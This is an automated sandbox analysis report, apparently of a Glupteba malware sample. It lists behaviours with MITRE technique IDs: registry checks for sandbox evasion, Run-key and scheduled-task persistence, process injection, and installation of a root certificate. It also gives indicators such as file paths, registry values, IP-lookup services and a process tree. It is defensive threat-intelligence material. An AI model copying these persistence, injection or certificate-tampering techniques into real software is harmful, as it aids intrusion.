glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MIcIvpI4I70jogh_7GmzX0Re.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	q3k71AT3BZDEsXUrePQAIsLS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	q3k71AT3BZDEsXUrePQAIsLS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bZJT82MkAWZQQp7_JaeQ1dSF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bZJT82MkAWZQQp7_JaeQ1dSF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1QzI74oJk44h5pnSKCFUFrND.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1QzI74oJk44h5pnSKCFUFrND.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MIcIvpI4I70jogh_7GmzX0Re.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Setup (18).exe

Loads dropped DLL 2 IoCs

pid	Process
4536	4TS5KEf_GCWhHvczBXfd5Urj.tmp
4536	4TS5KEf_GCWhHvczBXfd5Urj.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 12 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral20/files/0x000100000001abb5-134.dat	themida
behavioral20/files/0x0002000000015646-135.dat	themida
behavioral20/files/0x000100000001abbf-160.dat	themida
behavioral20/files/0x0002000000015646-164.dat	themida
behavioral20/files/0x000100000001abbd-157.dat	themida
behavioral20/files/0x000100000001abbd-171.dat	themida
behavioral20/files/0x000100000001abbf-177.dat	themida
behavioral20/files/0x000100000001abb5-167.dat	themida
behavioral20/memory/1712-226-0x0000000000380000-0x0000000000381000-memory.dmp	themida
behavioral20/memory/196-239-0x0000000000C40000-0x0000000000C41000-memory.dmp	themida
behavioral20/memory/1280-256-0x0000000000090000-0x0000000000091000-memory.dmp	themida
behavioral20/memory/2724-266-0x0000000000EF0000-0x0000000000EF1000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	Inlog.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1QzI74oJk44h5pnSKCFUFrND.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	q3k71AT3BZDEsXUrePQAIsLS.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MIcIvpI4I70jogh_7GmzX0Re.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	bZJT82MkAWZQQp7_JaeQ1dSF.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 15 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
356	ipinfo.io
31	ipinfo.io
134	ipinfo.io
352	ipinfo.io
131	ipinfo.io
205	ipinfo.io
367	ip-api.com
32	ipinfo.io
124	ip-api.com
325	ipinfo.io
204	ipinfo.io
344	ipinfo.io
182	ipinfo.io
186	ipinfo.io
201	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
196	MIcIvpI4I70jogh_7GmzX0Re.exe
1280	q3k71AT3BZDEsXUrePQAIsLS.exe
1712	1QzI74oJk44h5pnSKCFUFrND.exe
2724	bZJT82MkAWZQQp7_JaeQ1dSF.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3944 set thread context of 4904	3944	OswiwDLy8o9Ia_NYRV9VXqA9.exe	120
PID 2400 set thread context of 4920	2400	MjT1m_JgjTVfbcEbgFdw8igH.exe	117
PID 1408 set thread context of 5028	1408	AVqk1UPoSsbAvzi4L5Kuu6bC.exe	118

Drops file in Program Files directory 20 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe	Setup.exe
File created	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe	Setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 37 IoCs

pid	pid_target	Process	procid_target
2120	1648	WerFault.exe	90
4408	1648	WerFault.exe	90
4564	1648	WerFault.exe	90
3576	1648	WerFault.exe	90
4572	4416	WerFault.exe	111
5628	1648	WerFault.exe	90
5676	1648	WerFault.exe	90
6024	192	WerFault.exe	92
6104	1648	WerFault.exe	90
5780	192	WerFault.exe	92
6008	192	WerFault.exe	92
6536	192	WerFault.exe	92
1836	192	WerFault.exe	92
6264	5532	WerFault.exe	204
6376	192	WerFault.exe	92
5572	6492	WerFault.exe	198
4064	192	WerFault.exe	92
2660	2216	WerFault.exe	131
4760	6492	WerFault.exe	198
1784	2216	WerFault.exe	131
3744	6492	WerFault.exe	198
5112	2216	WerFault.exe	131
5128	6492	WerFault.exe	198
2656	6492	WerFault.exe	198
6244	6492	WerFault.exe	198
5404	2216	WerFault.exe	131
4180	2216	WerFault.exe	131
4180	2216	WerFault.exe	131
7660	6516	WerFault.exe	196
7852	6516	WerFault.exe	196
8080	6516	WerFault.exe	196
7300	6516	WerFault.exe	196
7524	6516	WerFault.exe	196
6100	6516	WerFault.exe	196
7932	6516	WerFault.exe	196
6276	6516	WerFault.exe	196
8144	6516	WerFault.exe	196

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Vmn4PVGj0R18eRXqQIBemdUg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Vmn4PVGj0R18eRXqQIBemdUg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Vmn4PVGj0R18eRXqQIBemdUg.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
8036	schtasks.exe
7636	schtasks.exe
7308	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1764	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5624	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Setup (18).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Setup (18).exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
7388	PING.EXE
5684	PING.EXE

Script User-Agent 16 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	348	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	137	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	183	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	200	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	338	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	156	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	161	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	202	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	329	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	158	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	326	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	358	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	133	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	134	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	152	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	167	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3228	Setup (18).exe
3228	Setup (18).exe
1264	Vmn4PVGj0R18eRXqQIBemdUg.exe
1264	Vmn4PVGj0R18eRXqQIBemdUg.exe
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2832	Process not Found
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2832	Process not Found
2832	Process not Found
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2832	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1264	Vmn4PVGj0R18eRXqQIBemdUg.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	2452	0caebW5jEXToU5eC3PMuq4f0.exe
Token: SeDebugPrivilege	3940	yoodz44Yg0ljcCtGfnfw3ZlY.exe
Token: SeDebugPrivilege	1244	wD5NwThcOmu4o3xMhUXyWYit.exe
Token: SeDebugPrivilege	196	MIcIvpI4I70jogh_7GmzX0Re.exe
Token: SeDebugPrivilege	1712	1QzI74oJk44h5pnSKCFUFrND.exe
Token: SeDebugPrivilege	1280	q3k71AT3BZDEsXUrePQAIsLS.exe
Token: SeDebugPrivilege	4904	OswiwDLy8o9Ia_NYRV9VXqA9.exe
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeDebugPrivilege	2724	bZJT82MkAWZQQp7_JaeQ1dSF.exe
Token: SeRestorePrivilege	2120	WerFault.exe
Token: SeBackupPrivilege	2120	WerFault.exe
Token: SeDebugPrivilege	4920	MjT1m_JgjTVfbcEbgFdw8igH.exe
Token: SeDebugPrivilege	5028	AVqk1UPoSsbAvzi4L5Kuu6bC.exe
Token: SeDebugPrivilege	2120	WerFault.exe
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeDebugPrivilege	3176	2329176.exe
Token: SeDebugPrivilege	4408	WerFault.exe
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeShutdownPrivilege	2832	Process not Found
Token: SeCreatePagefilePrivilege	2832	Process not Found
Token: SeDebugPrivilege	4564	WerFault.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4536	4TS5KEf_GCWhHvczBXfd5Urj.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3228 wrote to memory of 1264	3228	Setup (18).exe	88
PID 3228 wrote to memory of 1264	3228	Setup (18).exe	88
PID 3228 wrote to memory of 1264	3228	Setup (18).exe	88
PID 3228 wrote to memory of 1244	3228	Setup (18).exe	89
PID 3228 wrote to memory of 1244	3228	Setup (18).exe	89
PID 3228 wrote to memory of 1244	3228	Setup (18).exe	89
PID 3228 wrote to memory of 3940	3228	Setup (18).exe	84
PID 3228 wrote to memory of 3940	3228	Setup (18).exe	84
PID 3228 wrote to memory of 3940	3228	Setup (18).exe	84
PID 3228 wrote to memory of 1280	3228	Setup (18).exe	83
PID 3228 wrote to memory of 1280	3228	Setup (18).exe	83
PID 3228 wrote to memory of 1280	3228	Setup (18).exe	83
PID 3228 wrote to memory of 1816	3228	Setup (18).exe	85
PID 3228 wrote to memory of 1816	3228	Setup (18).exe	85
PID 3228 wrote to memory of 1816	3228	Setup (18).exe	85
PID 3228 wrote to memory of 2400	3228	Setup (18).exe	81
PID 3228 wrote to memory of 2400	3228	Setup (18).exe	81
PID 3228 wrote to memory of 2400	3228	Setup (18).exe	81
PID 3228 wrote to memory of 1408	3228	Setup (18).exe	87
PID 3228 wrote to memory of 1408	3228	Setup (18).exe	87
PID 3228 wrote to memory of 1408	3228	Setup (18).exe	87
PID 3228 wrote to memory of 3944	3228	Setup (18).exe	86
PID 3228 wrote to memory of 3944	3228	Setup (18).exe	86
PID 3228 wrote to memory of 3944	3228	Setup (18).exe	86
PID 3228 wrote to memory of 2716	3228	Setup (18).exe	79
PID 3228 wrote to memory of 2716	3228	Setup (18).exe	79
PID 3228 wrote to memory of 2716	3228	Setup (18).exe	79
PID 3228 wrote to memory of 2724	3228	Setup (18).exe	80
PID 3228 wrote to memory of 2724	3228	Setup (18).exe	80
PID 3228 wrote to memory of 2724	3228	Setup (18).exe	80
PID 3228 wrote to memory of 2452	3228	Setup (18).exe	82
PID 3228 wrote to memory of 2452	3228	Setup (18).exe	82
PID 3228 wrote to memory of 2164	3228	Setup (18).exe	96
PID 3228 wrote to memory of 2164	3228	Setup (18).exe	96
PID 3228 wrote to memory of 2164	3228	Setup (18).exe	96
PID 3228 wrote to memory of 1648	3228	Setup (18).exe	90
PID 3228 wrote to memory of 1648	3228	Setup (18).exe	90
PID 3228 wrote to memory of 1648	3228	Setup (18).exe	90
PID 3228 wrote to memory of 3108	3228	Setup (18).exe	95
PID 3228 wrote to memory of 3108	3228	Setup (18).exe	95
PID 3228 wrote to memory of 3108	3228	Setup (18).exe	95
PID 3228 wrote to memory of 2392	3228	Setup (18).exe	93
PID 3228 wrote to memory of 2392	3228	Setup (18).exe	93
PID 3228 wrote to memory of 2392	3228	Setup (18).exe	93
PID 3228 wrote to memory of 192	3228	Setup (18).exe	92
PID 3228 wrote to memory of 192	3228	Setup (18).exe	92
PID 3228 wrote to memory of 192	3228	Setup (18).exe	92
PID 3228 wrote to memory of 196	3228	Setup (18).exe	91
PID 3228 wrote to memory of 196	3228	Setup (18).exe	91
PID 3228 wrote to memory of 196	3228	Setup (18).exe	91
PID 3228 wrote to memory of 1712	3228	Setup (18).exe	103
PID 3228 wrote to memory of 1712	3228	Setup (18).exe	103
PID 3228 wrote to memory of 1712	3228	Setup (18).exe	103
PID 3228 wrote to memory of 4292	3228	Setup (18).exe	108
PID 3228 wrote to memory of 4292	3228	Setup (18).exe	108
PID 3228 wrote to memory of 4292	3228	Setup (18).exe	108
PID 2164 wrote to memory of 4352	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	109
PID 2164 wrote to memory of 4352	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	109
PID 2164 wrote to memory of 4352	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	109
PID 2164 wrote to memory of 4376	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	110
PID 2164 wrote to memory of 4376	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	110
PID 2164 wrote to memory of 4376	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	110
PID 2164 wrote to memory of 4416	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	111
PID 2164 wrote to memory of 4416	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	111

C:\Users\Admin\AppData\Local\Temp\Setup (18).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3228
- C:\Users\Admin\Documents\H99IIYBCp415OLNLtdHnTFmS.exe
  "C:\Users\Admin\Documents\H99IIYBCp415OLNLtdHnTFmS.exe"
  2⤵
  - Executes dropped EXE
  PID:2716
- - C:\Users\Admin\Documents\H99IIYBCp415OLNLtdHnTFmS.exe
    "C:\Users\Admin\Documents\H99IIYBCp415OLNLtdHnTFmS.exe"
    3⤵
    PID:9908
- C:\Users\Admin\Documents\bZJT82MkAWZQQp7_JaeQ1dSF.exe
  "C:\Users\Admin\Documents\bZJT82MkAWZQQp7_JaeQ1dSF.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:2724
- C:\Users\Admin\Documents\MjT1m_JgjTVfbcEbgFdw8igH.exe
  "C:\Users\Admin\Documents\MjT1m_JgjTVfbcEbgFdw8igH.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2400
- - C:\Users\Admin\Documents\MjT1m_JgjTVfbcEbgFdw8igH.exe
    C:\Users\Admin\Documents\MjT1m_JgjTVfbcEbgFdw8igH.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4920
- C:\Users\Admin\Documents\0caebW5jEXToU5eC3PMuq4f0.exe
  "C:\Users\Admin\Documents\0caebW5jEXToU5eC3PMuq4f0.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2452
- - C:\Users\Admin\AppData\Roaming\2329176.exe
    "C:\Users\Admin\AppData\Roaming\2329176.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3176
- - C:\Users\Admin\AppData\Roaming\1029792.exe
    "C:\Users\Admin\AppData\Roaming\1029792.exe"
    3⤵
    PID:2104
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      Executes dropped EXE
      PID:4368
- C:\Users\Admin\Documents\q3k71AT3BZDEsXUrePQAIsLS.exe
  "C:\Users\Admin\Documents\q3k71AT3BZDEsXUrePQAIsLS.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:1280
- C:\Users\Admin\Documents\yoodz44Yg0ljcCtGfnfw3ZlY.exe
  "C:\Users\Admin\Documents\yoodz44Yg0ljcCtGfnfw3ZlY.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3940
- C:\Users\Admin\Documents\7D32Le47Ps_lp5bMpkU5RnGM.exe
  "C:\Users\Admin\Documents\7D32Le47Ps_lp5bMpkU5RnGM.exe"
  2⤵
  - Executes dropped EXE
  PID:1816
- C:\Users\Admin\Documents\OswiwDLy8o9Ia_NYRV9VXqA9.exe
  "C:\Users\Admin\Documents\OswiwDLy8o9Ia_NYRV9VXqA9.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3944
- - C:\Users\Admin\Documents\OswiwDLy8o9Ia_NYRV9VXqA9.exe
    C:\Users\Admin\Documents\OswiwDLy8o9Ia_NYRV9VXqA9.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4904
- C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe
  "C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1408
- - C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe
    C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe
    3⤵
    - Executes dropped EXE
    PID:4884
- - C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe
    C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5028
- C:\Users\Admin\Documents\Vmn4PVGj0R18eRXqQIBemdUg.exe
  "C:\Users\Admin\Documents\Vmn4PVGj0R18eRXqQIBemdUg.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1264
- C:\Users\Admin\Documents\wD5NwThcOmu4o3xMhUXyWYit.exe
  "C:\Users\Admin\Documents\wD5NwThcOmu4o3xMhUXyWYit.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1244
- C:\Users\Admin\Documents\QHgwKa28V7P5sqyE2Sl0_hFF.exe
  "C:\Users\Admin\Documents\QHgwKa28V7P5sqyE2Sl0_hFF.exe"
  2⤵
  - Executes dropped EXE
  PID:1648
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 660
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 700
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:4408
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 740
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:4564
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 840
    3⤵
    - Program crash
    PID:3576
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 1132
    3⤵
    - Program crash
    PID:5628
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 1160
    3⤵
    - Program crash
    PID:5676
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 1124
    3⤵
    - Program crash
    PID:6104
- C:\Users\Admin\Documents\MIcIvpI4I70jogh_7GmzX0Re.exe
  "C:\Users\Admin\Documents\MIcIvpI4I70jogh_7GmzX0Re.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:196
- C:\Users\Admin\Documents\D15mnp9yV3DSru0qxTrTPLC5.exe
